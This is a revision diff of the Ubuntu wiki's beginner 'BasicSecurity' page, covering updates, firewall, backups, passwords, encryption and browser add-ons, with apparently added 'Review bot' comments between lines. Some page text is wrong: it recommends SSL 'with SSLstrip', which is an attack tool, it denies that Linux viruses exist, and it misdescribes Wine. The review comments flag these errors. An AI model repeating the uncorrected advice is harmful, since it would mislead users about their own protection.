BasicSecurity

Differences between revisions 88 and 121 (spanning 33 versions)
Revision 88 as of 2011-11-11 19:15:49
Size: 35671
Editor: 96-28-46-134
Comment:
Revision 121 as of 2012-12-28 10:50:07
Size: 24152
Editor: host86-182-68-148
Comment:
Deletions are marked like this. Additions are marked like this.
Line 4: Line 4:
Security is a very broad, potentially daunting subject to a new Ubuntu user. It's crazy to think that anyone can boil security down to a list of 7 things. So we didn't even try. Instead, our goal is to present a listing of the most basic security concepts that can be fairly easily implemented while you learn. This guide was inspired and written by several new users of Ubuntu who were very interested in learning how to hack around their brand new Ubuntu operating systems. We were lucky enough to have some security professionals collaborate with us. But we still don't claim that we will reduce your risk to zero. We are presenting a pragmatic approach to security.<<BR>><<BR>> Security is a very broad, potentially daunting subject to a new Ubuntu user. It's crazy to think that anyone can boil security down to a list of 7 things. So we didn't even try. Instead, our goal is to present a listing of the most basic security concepts that can be fairly easily implemented while you learn. This guide was inspired and written by several new users of Ubuntu who were very interested in learning how to hack around their brand new Ubuntu operating systems. We were lucky enough to have some security professionals collaborate with us. But we still don't claim that we will reduce your risk to zero. We are presenting a pragmatic approach to security.<<BR>>
Line 9: Line 9:
= The most basic set of rules =
If you're a simple desktop user who only uses his computer for the most ordinary things, then this is the basic rule set:<<BR>>
1. immediately install security updates when you're notified;<<BR>>
2. do not install antivirus, as you *really* don't need it in Linux;unless you share files with Windows<<BR>>
3. enable the firewall (sudo ufw enable) without further tweaks;<<BR>>
4. stick to the official repo's as much as possible, and only deviate from them when strictly necessary and with much caution;<<BR>>
5. keep Java (both openJDK and Oracle Java) disabled by default in your browser, and only enable it when needed;<<BR>>
6. use Wine with caution;<<BR>>
7. and most important of all: use your common sense. The biggest security threat is generally found between keyboard and chair.<<BR>>
<<BR>>
If you have higher security needs, then read on.
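Review bot: rule 2 runs ";unless you share files with Windows" straight into the previous clause and gives no reason for the exception, so a new user cannot tell whether the scanner is meant to protect them or someone else. Suggest: "2. do not install antivirus; you do not need it to protect Linux itself, but if you pass files on to Windows machines an on-demand scanner such as ClamAV (package clamav in the repositories) lets you check those files for the Windows users' sake;". Rule 3 would also benefit from one clause saying what "sudo ufw enable" does with no further tweaks, namely deny unsolicited incoming connections and allow everything outgoing, because the firewall section later on this page never states that default policy.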
Line 11: Line 23:
In order to simplify the very complex world of security, we have broken it down into two sections. In this first section, we will discuss security tools in Ubuntu that you can configure and do not require a lot of interaction from you. We will also discuss general security concepts that are easy to implement into your daily computer use. There is a lot of existing security information already in existence in the Ubuntu Wikis and stickies in the [[ubuntuforums.org | Ubuntu Forums]]. There are some great resources there, in fact [[http://ubuntuforums.org/showthread.php?t=510812|one of the best guides is linked here]]. But a lot of that material will seem complex to the new Ubuntu user - so the goal of this guide was to take the existing material and simplify it, making it possible to bridge the gap.<<BR>><<BR>> In order to simplify the very complex world of security, we have broken it down into two sections. In this first section, we will discuss security tools in Ubuntu that you can configure and (once configured) require little interaction. We will also discuss general security concepts that are easy to implement into your daily computer use. There is a lot of existing security information already in existence in the Ubuntu Wikis and stickies in the [[ubuntuforums.org | Ubuntu Forums]]. There are some great resources there, in fact [[http://ubuntuforums.org/showthread.php?t=510812|one of the best guides is linked here]]. But a lot of that material will seem complex to the new Ubuntu user - so the goal of this guide was to take the existing material and simplify it, making it possible to bridge the gap.<<BR>><<BR>>
Line 15: Line 27:
We've all heard the argument that if you make a system secure, you also hinder access, create obstacles, and complicate use. It is up to the individual user to determine what his tolerance for risk is. This Wiki will outline vectors of potential vulnerabilities in your Ubuntu system.  You have the right to choose not to defend against them, but do so only after first understanding them. <<BR>><<BR>> We've all heard the argument that if you make a system secure, you also hinder access, create obstacles, and complicate use. '''It is up to the individual user to determine what his tolerance for risk is.''' This Wiki will outline vectors of potential vulnerabilities in your Ubuntu system, and you can evaluate them and determine how those risks relate to your personal situation. <<BR>><<BR>>
Line 19: Line 31:
In very general, broad terms, Windows is more targeted than Linux or Mac when it comes to malicious attacks aimed at mass victims. But a determined hacker can just as easily crack a Linux machine as any other. There are known [[https://help.ubuntu.com/community/Linuxvirus|viruses]] and [[http://www.ubuntu.com/usn|vulnerabilities]] that you need to defend against. <<BR>><<BR>> The majority of new users are coming from Windows environments, where security focuses mostly on anti-virus software. To understand security on Ubuntu, you must shift your thinking from this point of view. In the following bullets, we're going to analyze what threats actually effect you as a Ubuntu user.
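Review bot: "what threats actually effect you as a Ubuntu user" should read "affect you" (the verb); the same slip is repeated in the Myth VS. Reality paragraph below. Otherwise the added sentence about shifting away from an anti-virus mindset is the right framing for the rest of the section.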
Line 21: Line 33:
 * '''Myth''': If I install an anti-virus program I'll be fine.<<BR>>
Line 22: Line 35:
=== Myth VS. Reality ===

It is quite common that many Ubuntu users will parrot the phrase “Ubuntu is Secure”. Now we're not here to spread those ever popular words, Fear, Uncertainty, and Doubt. However since you're reading this you obviously have an interest in security, and probably have guessed that nothing is truly secure. That being said, we're going to analyze what threats ACTUALLY effect you as a Ubuntu user. We're going to address several common myths, misnomers and misunderstandings about how Ubuntu protects you, or in some cases doesn't protect you.<<BR>><<BR>>
 * '''Reality''': At the time of writing, there are no known viruses on the big bad web designed to target Linux. A few targeting Windows can execute in a manner that could allow compromise of a Linux system via an interpreter layer like [[https://help.ubuntu.com/community/Wine|Wine]]. Very few people recommend existing anti-virus software for Linux machines, in part because there are few decent free anti-malware solutions available. Enterprise class solutions are good, but the consumer-grade products aren't on par with their Windows counterparts enough to warrant their use. Moreover, if you focus entirely on viruses then you are ignoring the vast majority of real threats to your Ubuntu machine. <<BR>>
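Review bot: the Reality paragraph opens with "there are no known viruses on the big bad web designed to target Linux", which contradicts the sentence a few lines earlier in this same revision: "There are known [[https://help.ubuntu.com/community/Linuxvirus|viruses]] and [[http://www.ubuntu.com/usn|vulnerabilities]] that you need to defend against." The linked page is itself a list of Linux malware. Suggest: "At the time of writing, very little malware in the wild targets desktop Linux, and none of it spreads the way Windows viruses do", which keeps the point (anti-virus is not where your effort should go) without an absolute claim the page elsewhere denies.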
Line 28: Line 39:
 * '''Reality''': Linux/Ubuntu aren't really all that obscure to “crackers”. They may be obscure to you or your friends, however, there are many who know how to exploit Linux vulnerabilities just as easy as Windows, Mac OSX, Solaris, AIX, or any other operating system's vulnerabilities. The best defense is knowledge and preparation. Relying on an “obscure” operating system to hide behind is NOT a good strategy.<<BR>>  * '''Reality''': It's a favoured argument from Linux supporters, but Linux/Ubuntu is not that obscure to “crackers”. They may be obscure to you or your friends, however, there are many who know how to exploit Linux vulnerabilities just as easy as Windows, Mac OSX, Solaris, AIX, or any other operating system's vulnerabilities. The best defence is knowledge and preparation. Relying on an “obscure” operating system to hide behind is NOT a good strategy.<<BR>>
Line 32: Line 43:
 * '''Reality''': While the above statement does carry some weight in that most malware targets Windows, it neglects to mention that an entire spectrum of web based attack vectors exist that are operating-system-agnostic in nature. Cross Site Scripting, Cross Site Request Forgery, Click-Jacking, Session Riding, and many other methods can be used to exploit weaknesses in a relationship of trust between you and a website, or a website and you, regardless of your operating system. For things like this we have browser add-ons which will be discussed in the [[browser]] security section.<<BR>>  * '''Reality''': While the majority of malware does target Windows, this statement overlooks the fact that an entire spectrum of web based attack vectors exist that work on '''any''' operating system. Cross Site Scripting, Cross Site Request Forgery, Click-Jacking, Session Riding, and many other methods can be used to exploit weaknesses in a relationship of trust between you and a website, or a website and you, regardless of your operating system. For things like this we have browser add-ons which will be discussed in the browser security section.<<BR>>
Line 34: Line 45:
 * '''Myth''': I don't need to use fancy browser add-ons or SSL when using public access wifi because I use Ubuntu.<<BR>>  * '''Myth''': I don't need to use fancy browser add-ons when using public access wifi because I use Ubuntu.<<BR>>
Line 36: Line 47:
 * '''Reality''': While I haven't seen this statement made quite as often, it is completely absurd. Most attacks carried out on public wifi include several varieties of man in the middle attacks, as well as multiple methods for credential theft (both for SSL and unencrypted traffic). If you absolutely have to or want to utilize public wifi, it is highly discouraged to do anything less than trivial in nature with it. If you must do important tasks such as banking while on public access wifi, it is recommended that you invest in VPN access, or create an SSH forward to your home machine prior to performing such tasks. If you just can not use those, it is imperative that you at least use SSL, though this can still be broken with an airbase attack. Used in conjunction with SSLstrip, it will at least afford you some extra protection.<<BR>>  * '''Reality''': An absurd statement. Most attacks carried out on public wifi include several varieties of [[http://en.wikipedia.org/wiki/Man-in-the-middle_attack|man in the middle attacks]]. If you want to utilize public wifi, it is highly discouraged to do anything more than trivial in nature with it unless you are an advanced user and you know how to set up a [[http://www.howstuffworks.com/vpn.htm|virtual private network (VPN)]], a [[https://help.ubuntu.com/community/SSH_VPN|VPN via Secure Shell (SSH)]], or use [[http://searchsecurity.techtarget.com/definition/Secure-Sockets-Layer-SSL|Secure Sockets Layer (SSL)]] in conjunction with SSLstrip.<<BR>>
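Review bot: the revised Reality paragraph tells the reader to "use Secure Sockets Layer (SSL) in conjunction with SSLstrip". SSLstrip is the attacker's tool here: it runs in exactly the man-in-the-middle position the paragraph describes and silently rewrites HTTPS links to plain HTTP so the victim never gets the encrypted session. The deleted text had the same slip ("Used in conjunction with SSLstrip, it will at least afford you some extra protection"). Suggest: "If you cannot use a VPN or SSH tunnel, at least insist on HTTPS and check that the browser shows the padlock on every page where you enter credentials, because a tool such as SSLstrip sitting between you and the access point can quietly downgrade HTTPS links to HTTP." The VPN and SSH-tunnel advice should stay as the real answer for anything sensitive on public wifi.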
Line 40: Line 51:
 * '''Reality''': This is a matter of tolerance for risk. Added protection, particularly that which takes only a few minutes to set up, is always worth it. There are many points made in the several links discussing [[firewalls]] later in this document that explain why a firewall is a good thing to have, and what type of rules it should utilize. Ultimately the choice on that is yours. <<BR>>  * '''Reality''': This is a matter of risk tolerance. Added protection, particularly that which takes only a few minutes to set up, is always worth it. Firewalls are discussed in more depth later in this document. <<BR>>
Line 44: Line 55:
 * '''Reality''': While this is mostly a gag joke discussed on nix forums, the reality is that Ubuntu CAN be compromised by Windows malware if you're using Wine. This is not to say that Windows malware can infect a Linux system directly, however it CAN, if targeted properly, utilize the Wine interpreter to send system calls to the Linux kernel. This is a very rare case, and it is highly unlikely that it would occur as it would be a very targeted attack. But for completeness sake we should mention that it CAN happen. <<BR>>  * '''Reality''': Ubuntu CAN be compromised by Windows malware if you're using [[https://help.ubuntu.com/community/Wine|Wine]]. This is not to say that Windows malware can infect a Linux system directly, however it CAN, if targeted properly, utilize the Wine interpreter to send system calls to the Linux kernel. This is a very rare case, and it is highly unlikely that it would occur as it would be a very targeted attack. But for completeness sake we should mention that it CAN happen. <<BR>>
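Review bot: "utilize the Wine interpreter to send system calls to the Linux kernel" and "it would be a very targeted attack" understate the risk. Wine is not an interpreter; the Windows executable runs natively as your user with Wine translating Win32 API calls, and by default Wine maps the whole filesystem as drive Z:, so ordinary, untargeted Windows malware run under Wine can read, encrypt or delete everything your user account can reach. It cannot escalate beyond your privileges through Wine, but it does not need to be written for Linux to do damage. Suggest replacing the two "CAN" sentences with: "Windows malware run under Wine executes with your user's privileges and sees your files through the Z: drive mapping, so treat any Windows program you run in Wine exactly as you would on Windows."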
Line 46: Line 57:
 * '''Myth''': Ubuntu is harder to exploit than Windows, Mac OSX, whatever else.<<BR>>  * '''Myth''': Ubuntu is harder to exploit than Windows, Mac OSX, whatever else - and it's targeted less than those other operating systems as well.<<BR>>
Line 48: Line 59:
 * '''Reality''': Not really, the process of discovering a vulnerability and exploiting it is pretty much the same across the board. <<BR>>  * '''Reality''': The process of discovering a vulnerability and exploiting it is pretty much the same across the board, regardless of operating system. <<BR>>
Line 50: Line 61:
 * '''Myth''': Well its not targeted as much as Windows.<<BR>> These are just some common myths associated with Ubuntu and security. This list is not comprehensive, but it covers the largest misconceptions held by new users. This does not mean that Ubuntu is inherently insecure, or is less secure than previous versions, or is more/less secure than any other operating system. It is just an effort to dispel common myths and get the reader (you) thinking in a positive direction toward improving their system's security posture. If you follow the steps in this Wiki, you will have a decent defense built to protect your machine from viruses as well as the other more pressing threats out there.<<BR>>
Line 52: Line 63:
 * '''Reality''': On the home front maybe not, however if you happen to be running services on your home network's Ubuntu machine, perhaps a game server or an ftp server, you might find yourself becoming the target of a cracking attempt.<<BR>><<BR>>

These are just some common myths associated with Ubuntu and security. This list is not comprehensive, but it covers the largest faux pas made by new users. Again, none of this is saying that Ubuntu is inherently insecure, or is any less secure than it has been in the past, or any other operating system is for that matter. It is just an effort to dispel common myths and get the reader (you) thinking in a positive direction toward improving their system's security posture.<<BR>><<BR>>
And of course, we'd be remiss not to mention social engineering. What information you're putting into public view? Do you know who you're giving valuable information to? [[http://searchsecurity.techtarget.com/definition/social-engineering|Social engineering]] is important to understand but beyond the scope of this Wiki.<<BR>>
Line 59: Line 67:
Reinstalling an OS again after it corrupts is annoying. But losing valuable personal pictures, letters, emails...they are priceless! If you are prepared to wipe and reinstall with very little notice, then you are far more secure. Moreover, there are many threads in the Ubuntu Forums that describe problems that would have been avoided if the user had [[https://help.ubuntu.com/community/BackupYourSystem|made good backups]]. It is also important to make special backup before certain risky operations like upgrading to a new version, operations on partitions and partition tables, using dd, etc. And if you're concerned that your computer has been infected or "cracked," then you can restore Ubuntu to a known previously good state. <<BR>><<BR>> Reinstalling an operating system again after it corrupts is annoying. But losing valuable personal pictures, letters, emails... these are priceless and cannot be replaced. If you are prepared to wipe and reinstall with very little notice, then you are far more secure. Moreover, there are many threads in the Ubuntu Forums that describe problems that would have been avoided if the user had [[https://help.ubuntu.com/community/BackupYourSystem|made good backups]]. It is important to make special backups before certain risky operations like upgrading to a new version, operations on partitions and partition tables, using dd, etc. Finally, if you're concerned that your computer has been infected or "cracked," then you can restore Ubuntu to a known previously good state. <<BR>>
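Review bot: "you can restore Ubuntu to a known previously good state" only holds if a backup exists from before the compromise; a single backup that is overwritten on every run will capture the malware and any tampered files along with your data. Suggest adding one sentence: keep several generations of backups rather than one copy, and after a suspected compromise reinstall from the install media and restore personal data only, not the system files.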
Line 61: Line 69:
To quote the introduction of [[https://help.ubuntu.com/community/DuplicityBackupHowto|this]], "There are many different applications that are available to backup Ubuntu. Each one has its strengths and weaknesses. Some are made for enterprise environments where it is necessary to back up many computers quickly and efficiently. Others are made for home environments and come with a simple wizard-driven GUI interface. Still others need to be accessed with the command line.<<BR>><<BR>>

"Besides the interfaces of various backup applications, these applications have varied functions. For example, a particular application can backup to one or many DVDs, CDs, disk drives, FTP sites, SMB drives, and other media or may not backup to one or more of those things. As varied as these programs are, so are the needs of the individuals who use them." [[https://help.ubuntu.com/community/jmburgess/Backup|This link]] can help you decide where to backup your data, what to backup, and when. <<BR>><<BR>>
To quote the introduction of [[https://help.ubuntu.com/community/DuplicityBackupHowto|Duplicity Backup]], "There are many different applications that are available to backup Ubuntu. Each one has its strengths and weaknesses. Some are made for enterprise environments where it is necessary to back up many computers quickly and efficiently. Others are made for home environments and come with a simple wizard-driven GUI or command line interface...Each application can backup to one or many DVDs, CDs, disk drives, and other media or may not backup to one or more of those things. As varied as these programs are, so are the needs of the individuals who use them." [[https://help.ubuntu.com/community/jmburgess/Backup|This link]] can help you decide where to backup your data, what to backup, and when. <<BR>><<BR>>
Line 68: Line 74:
Strong unique passwords for each account is best - consider using a password safe (but remember that that password MUST be a good one!) There's enough material on the subject of passwords to keep even the most busy of readers occupied for a few hours. You can use an [[https://www.grc.com/passwords.htm|automatic creator of strong passwords to help understand how complex passwords can be]]. You can [[https://www.grc.com/haystack.htm|test your password here]]. And here are [[https://help.ubuntu.com/community/StrongPasswords|more tips on creating good passwords - including why using an on-line automatic password creator is bad]]. Remember to beware of on-line sites where they offer to test password strength. To the uninitiated: remember that these sites have your IP Address as well as your potential password and/or methods you use to construct them. How do you know that a malicious script designed to collect this information is not running from the site? When you use these site, remember that you are giving someone you don't know your password. Beware who your trust with your information. <<BR>><<BR>> Obviously if an attacker doesn't have your password, then it's harder for him to make changes on your machine. A strong unique password for each account is best - consider using a password safe (but remember that that password MUST be a good one!) [[http://www.cs.umd.edu/faq/Passwords.shtml|Read this discussion]] regarding the process of choosing a good password. <<BR>><<BR>>
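Review bot: the revision drops the old warning about on-line password testers ("these sites have your IP Address as well as your potential password"). That was the most practical sentence in the paragraph and the new text gives no replacement rule of thumb. Suggest keeping it in one line, "never type a password you actually use into a web form that offers to test it", and adding the one concrete rule the linked discussion supports: length matters more than symbols, so a passphrase of several unrelated words is both easier to remember and harder to guess than a short string of punctuation. The advice to use a password safe should also say that the safe's master password is then the one password that must be genuinely strong and never reused.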
Line 73: Line 79:
If you're following a set of instructions and you're about to type in sudo, ask yourself "Do I REALLY know what this command is about to do?" If you can't explain it to your granny, then you don't know what's going to happen. Related to that - if you get asked for your password, make sure you know what you've just done to trigger that response. The system is trying to protect you. Here is an [[https://help.ubuntu.com/community/RootSudo|explaination of sudo]] <<BR>><<BR>> If you're following a set of instructions and you're about to type in sudo, ask yourself "Do I REALLY know what this command is about to do?" If you can't explain it to your grandmother, then you don't know what's going to happen. Related to that - if you get asked for your password, make sure you know what you've just done to trigger that response. The system is trying to protect you. Here is an [[https://help.ubuntu.com/community/RootSudo|explaination of sudo]] <<BR>><<BR>>
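Review bot: "explaination of sudo" in the link text should be "explanation"; the typo survives unchanged from the earlier revision. The rest of the paragraph is sound, and it would be stronger with one concrete example of the question it asks the reader to pose, such as "a line that pipes a downloaded script straight into sudo runs that script as root before you have read it".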
Line 77: Line 83:
An excellent way to find yourself in deep trouble is to modify permissions as root. Logging in as root means you will be browsing the Internet as root, drive by downloads (downloads that you did not authorize or that you authorized but did not realize the consequence behind), malicious scripts can all now execute with root permission. Default settings in Ubuntu will not allow you to log in as root. Don't change that unless you fully understand the consequences. <<BR>><<BR>> An excellent way to find yourself in deep trouble is to modify permissions as root. Logging in as root means you will be browsing the Internet as root, drive by downloads (downloads that you did not authorize or that you authorized but did not realize the consequence behind), malicious scripts can all now execute with root permission. Default settings in Ubuntu will not allow you to log in as root. <<BR>><<BR>>
Line 81: Line 87:
You can encrypt your home folder or the [[ttps://help.ubuntu.com/community/EncryptedFilesystemHowto|entire hard drive]] on first install. Alternatively you can [[https://help.ubuntu.com/community/EncryptedHome|click here]] and [[http://ubuntuforums.org/showthread.php?t=1449168|here]] to learn how to add encryption to your home folder after installation. You could even just encrypt a particular file, a sub-directory, a usb stick... the choices are endless. WARNING: if you lose the password then your chances of recovering the data drop to almost nil.<<BR>><<BR>> Encrypting the home folder will help for physical security. If someone is able to sit down in front of your computer or if they steal it, they won't be able to see the files in your home folder. In Ubuntu when you encrypt the home folder, the folder mounts when you log in which makes it readable to anyone sitting in front of your computer. Once you log out, the home folder unmounts and is encrypted again. Encrypting the home folder will do nothing to protect you from on-line threats. As long as the encrypted folder is mounted, it will be plain text for anyone with access.

You can encrypt your home folder or the [[https://help.ubuntu.com/community/EncryptedFilesystemHowto|entire hard drive]] on first install. Alternatively you can [[https://help.ubuntu.com/community/EncryptedHome|click here]] and [[http://ubuntuforums.org/showthread.php?t=1449168|here]] to learn how to add encryption to your home folder after installation. You could even just encrypt a particular file, a sub-directory, a usb stick... the choices are endless. <<BR>>

There are risks with encryption, so carefully evaluate your personal situation to determine if it is right for you. If you lose the password then your chances of recovering the data drop to almost nil. You should also keep in mind that if you encrypt your home folder or hard drive, that if your system fails later on it will be harder to recover your files. You will have to consider the value of the data you store on your computer to determine if encryption is worth the risk. For instance, if you insist on saving a detailed list of all your financial accounts in a text file, then encryption is vital. But if you don't store anything of personal value on the hard drive, then encryption may be less necessary. <<BR>><<BR>>
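Review bot: the new risks paragraph says "if your system fails later on it will be harder to recover your files" but does not say what makes recovery possible at all. Ubuntu's encrypted home (ecryptfs) protects the data with a randomly generated mount passphrase that is only wrapped by your login password; `ecryptfs-unwrap-passphrase` prints it, and the reader should run that once after setup and store the output somewhere safe, because if the wrapped-passphrase file in ~/.ecryptfs is lost the login password alone cannot unlock the data from a rescue system. The first paragraph should also state the boundary plainly: an encrypted home only protects what is inside it, not data written to /tmp or to swap, and nothing at all while you are logged in.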
Line 85: Line 95:
Always make sure you are utilizing the least amount of privileges/permissions to do the task necessary. Use only what you need, nothing more. '''If you are surfing the net and come across a "drive-by download" site, if your privileges are not elevated then it is less likely to execute. IS THIS TRUE?''' Learn how to use file permissions and non-privileged users (which Ubuntu makes very easy). Also consider enabling guest accounts if you think they are necessary. Here is a link to [[https://help.ubuntu.com/community/FilePermissions|everything you need to know about file permissions]]. <<BR>><<BR>> Always make sure you are using the least amount of privileges/permissions to do the task necessary. Use only what you need, nothing more. If you are surfing the net and come across a "drive-by download" site, then what the malicious program has access to changes dramatically if it has lowered privileges. Learn how to use file permissions and non-privileged users (which Ubuntu makes very easy). Here is a link to [[https://help.ubuntu.com/community/FilePermissions|everything you need to know about file permissions]]. Also consider enabling guest accounts if you will have other people using your computer.<<BR>><<BR>>
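Review bot: "what the malicious program has access to changes dramatically if it has lowered privileges" is true for the system but misleading for a home user: a drive-by that runs as your normal account still has full read and write access to your home directory, your browser profile and your saved credentials, which is usually everything you care about. Suggest one sentence making that explicit, so the reader does not conclude that an unprivileged compromise is harmless, and a pointer that the guest account mentioned at the end gives visitors a separate, throwaway home directory rather than access to yours.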
Line 90: Line 100:
Security updates are released by Ubuntu developers when they discover and patch vulnerabilities. If you don't install the updates then you retain the vulnerability. Ubuntu allows you to have security updates installed - once configured you don't need to run security updates manually again. In the GUI, search for the Update Manager on your desktop and click on "settings" to configure how you want Ubuntu to manage updates. Or you can configure [[https://help.ubuntu.com/community/AutomaticSecurityUpdates|automatic updates via terminal]]. <<BR>><<BR>> Security updates are released by Ubuntu developers when they discover and patch vulnerabilities. If you don't install the updates then you retain the vulnerability. Ubuntu allows you to have security updates automatically installed - once configured you don't need to run security updates manually again. Search for the Update Manager on your desktop and click on "settings" to configure how you want Ubuntu to manage updates. Or you can configure [[https://help.ubuntu.com/community/AutomaticSecurityUpdates|automatic updates via terminal]]. <<BR>><<BR>>
Line 94: Line 104:
Don't run services you don't need. Do you really need a VOIP phone system? What about SSH, VNC, Apache? If you need a service, make sure you understand it and can properly secure it. You can't secure what you don't understand. (We hope that is starting to sound familiar.) <<BR>> <<BR>> Don't run services you don't need. Do you really need a VOIP phone system? What about Secure Shell (SSH), Virtual Network Computing (VNC), Apache server? If you need a service, make sure you understand it and can properly secure it. You can't secure what you don't understand. <<BR>> <<BR>>
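Review bot: the paragraph tells the reader not to run services they do not need but never says how to find out which services are listening. Suggest adding one command the reader can run, `sudo netstat -tulpn` (or `ss -tulpn`), with a note that each line in the output is a program accepting connections and that anything they cannot name is a candidate for removal or for a firewall rule.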
Line 98: Line 108:
<<Anchor(browser)>>One of the best things you can do is secure your browser, especially as it's one of the most vulnerable parts of your system as a home user. We will discuss Firefox because that's the browser packaged in Ubuntu. However, other browsers have similar features. The majority of threats to your machine come from your browser, even when you use common sense. You have absolutely no control over vulnerabilities on someone else's web page as an end user, so it's important to defend yourself against any malicious activity originating from a compromised web page. If you are interested in learning how browser exploits happen, you can read [[https://www.owasp.org/index.php/Top_10_2010-Main|this summary of the top ten vulnerabilities]] in a poorly designed web page. <<BR>>
Line 100: Line 110:
 * '''Preferences''': Find Preferences in the menu bar of Firefox. Choose not to "accept cookies", whitelist sites for specific needs using exceptions, allow for session at most; clear history when closing the browser. Choose "never remember history." Don't use "hardware acceleration". Secure your browser. We will discuss Firefox because that's the browser packaged in Ubuntu. However, other browsers have similar features. We recommend that you use the following services. As mentioned before, these measures may inhibit functionality until you manually configure them. Again you must weigh the need for security against the need for functionality as it relates to your personal situation.<<BR>>
Line 102: Line 112:
 * '''about:config''' --I'm pretty sure there's something in here where you can disable the ability to run scripts directly from the URL bar, that's probably important === Preferences ===
Line 104: Line 114:
 * [[https://addons.mozilla.org/en-US/firefox/addon/noscript/|Noscript]] prevents scripts (i.e. programs) from running on your system unless you allow them. Allow scripts from sites that you trust for a safer browsing experience. But don't "allow all scripts globally" under any circumstances! You can add a "revoke temporary permissions" button to the toolbar, and you can disable WebGL. Find Preferences in the menu bar of Firefox. Under the privacy tab you can tell web sites you don't want to be tracked and you can choose to never remember history. You can choose to whitelist sites for specific needs using exceptions, allow for session at most; clear history when closing the browser. Choose "never remember history" so that if someone hijacks your browser section, they won't find any valuable stored data. Don't use "hardware acceleration". <<BR>>
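Review bot: "if someone hijacks your browser section" should be "browser session". Also, "Don't use hardware acceleration" is given with no reason, while every other recommendation in the list explains what it protects against; either state the threat it is meant to address or drop it, since a reader cannot weigh a risk the page does not name.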
Line 106: Line 116:
 * [[https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/?src=ss|Adblock Plus]]: You can tell by the name that it (surprise!) blocks ads. Adblock Plus provides a default list of blocked ads. Additionally, you can block any individual ads or scripts that show up by adding them manually.
 * '''BetterPrivacy''': remove all LSOs when closing the browser (and after every known use of Flash content). Can add a button to the toolbar to make it easy to call up.
 * '''RefControl''': strips out referrer headers, makes some malicious sites think you're a search bot or malware researcher, and otherwise stops the collection of referral information.
 * '''RequestPolicy''': not for lightweights, very similar to NoScript and probably has some redundancy, good for an education in how pages on the web actually load and function.
 * '''Plugins''': disable the Java/OpenJDK plugins, and disable the plugin that loads PDFs in the browser window.
 * '''BleachBit''': use it after every browsing session.
 <<BR>><<BR>>
=== NoScript ===
If you unknowingly visit a compromised website, this will prevent scripts (i.e. programs) from running on your system. It can be a tricky tool to use at first glance as it blocks all scripts from running at first. If you spend a little time getting familiar with [[https://addons.mozilla.org/en-US/firefox/addon/noscript/|NoScript]], you will find it easier to use. As a user, you tell NoScript what sites to partially or fully trust. Don't "allow all scripts globally" under any circumstances! <<BR>>
Configuring NoScript is notoriously daunting to the new user. A helpful guide to configure NoScript is included on a separate page, [[https://wiki.ubuntu.com/BasicSecurity/NoScript]].
=== AdBlockPlus ===
You can tell by the name that it (surprise!) blocks annoying ads, but it can also block those ads from collecting personal information about you. [[https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/|Adblock Plus]] provides a default list of blocked ads. Additionally, you can block any individual ads or scripts that show up by adding them manually. <<BR>>
=== BetterPrivacy ===
The add-on [[https://addons.mozilla.org/en-US/firefox/addon/betterprivacy/|BetterPrivacy]] will prevent websites from installing “super cookies” on your computer designed to track your history for marketing research. <<BR>>
=== ClickClean ===
[[https://addons.mozilla.org/en-US/firefox/addon/clickclean/|ClickClean]] is a simple tool to delete your browsing history, erase all temporary internet files, remove downloaded files history, cookies, Flash LSO, typed URLs. It allows for automatic deletion of private data when Firefox closes. Basically, if your browser session is ever hijacked, then the hijacker will get little valuable information. <<BR>><<BR>>
The importance of securing your browser cannot be overstated. We've listed some of the simple tools you can implement to drastically improve your security. There are numerous others aimed at security as well as privacy; we encourage you to research those. <<BR>><<BR>>
Most computer users at home have a local network... often without even realising it. We encourage you to learn more about securing your home network - again, you can't secure what you don't understand. The [[http://www.cert.org/tech_tips/home_networks.html#I-A|CERT Guide to Home Network Security]] provides an excellent overview of the basic principles of networking and the internet. Learn some of the fundamentals [[http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm|about securing your router]]. For instance, if you use ''wireless access'', make sure you're using STRONG encryption: not WEP but WPA/WPA2. Use a GOOD password that uses the full 63 characters; you only have to type it once anyway.<<BR>>
So that was the "easy" stuff. True security is an ongoing process, and a lot of the really good security tools require regular interaction from you. The next tools we describe are more advanced because you cannot "set and forget" them. They also require more effort to set up and use effectively, but the effort is worth it. The more security measures you implement from this Wiki, the more secure you will be. <<BR>><<BR>>
== Firewall ==

<<Anchor(firewalls)>>There is a lot of existing information about firewalls - along with a long-term raging debate on the need of a firewall on Ubuntu. We recommend you enable it because you have ports open if you are reading this page. Traffic can go in and out of that port unhindered without a firewall. Malicious programs can open arbitrary ports unless you have a firewall to prevent that. A NAT router can add a layer of protection, but it will not protect you in lieu of a firewall. [[http://ubuntuforums.org/showthread.php?t=1871177|This additional guide]] will provide more information. <<BR>>

Use your firewall PROPERLY. Don't set it and forget it: learn how it works and set decent rules. [[https://wiki.ubuntu.com/BasicSecurity/Firewall|Here]] is a tutorial showing how to enable a firewall in Ubuntu. However, adding port numbers can feel confusing. If it helps, think of it this way - currently you're reading this guide because you accessed a webpage hosted by wiki.ubuntu.com. To make the connection (and therefore to see the content) your browser has to connect to that website on Port 80. Another example is when you pick up your email: your computer makes a connection to your mail server on Port 110. The other port numbers that you add provide similar functions.<<BR>><<BR>>
AppArmor can strengthen our security. To quote the Novell site, "AppArmor is designed to provide easy-to-use application security for both servers and workstations. Novell AppArmor is an access control system that lets you specify per program which files the program may read, write, and execute. AppArmor secures applications by enforcing good application behavior without relying on attack signatures, so it can prevent attacks even if they are exploiting previously unknown vulnerabilities." AppArmor has a pretty steep learning curve for new users. However, once you master it, creating profiles for most applications is fairly simple. It only gets tricky when you deal with applications that have to change functions a lot (for instance, Apache). [[http://ubuntuforums.org/showthread.php?t=1008906|Here is a tutorial on AppArmor]]. <<BR>><<BR>>
-----
= Did I Just Get Owned? =
A very popular question on the Ubuntu Forum is "I saw this output on a log. Is it bad?" This section will cover the basics of log auditing so that you can begin to understand which log output is concerning and which is probably harmless. We will also show you how to keep an eye on different aspects of your system in order to make sure you haven't gotten "owned".
For a helpful guide created by Dangertux which can help you determine if you have been compromised, see this page:<<BR>>
[[https://wiki.ubuntu.com/BasicSecurity/DidIJustGetOwned]]
-----
Logging is an incredibly powerful feature. It can give you intelligence on how an attack was carried out and the extent of the compromise. As such, if your system is cracked, the first thing a cracker will do after gaining root will be to sanitize your log files. One of the quickest ways to determine whether your system was compromised is to check whether your key log files have been tampered with. It's often glaringly obvious that a log file has been altered. Important signs to note in your log files when checking for tampering are the following:

 * '''Incorrect time stamps''': Attackers often copy a legitimate-looking log file over the existing one, which leaves a log whose entries do not cover the time they are supposed to.

 * '''Completely sanitized''': If the log file is completely gone, it is time to start suspecting something is up. Log files don't just disappear.

